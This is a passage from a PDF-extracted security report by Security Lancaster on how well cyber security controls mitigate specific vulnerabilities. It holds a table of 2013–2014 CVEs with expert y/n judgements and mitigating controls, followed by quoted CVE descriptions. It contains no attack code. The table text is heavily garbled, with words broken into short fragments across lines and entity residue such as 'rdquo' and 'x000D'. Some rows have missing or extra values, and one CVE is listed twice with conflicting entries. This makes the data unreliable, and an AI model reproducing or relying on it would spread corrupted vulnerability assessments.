Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
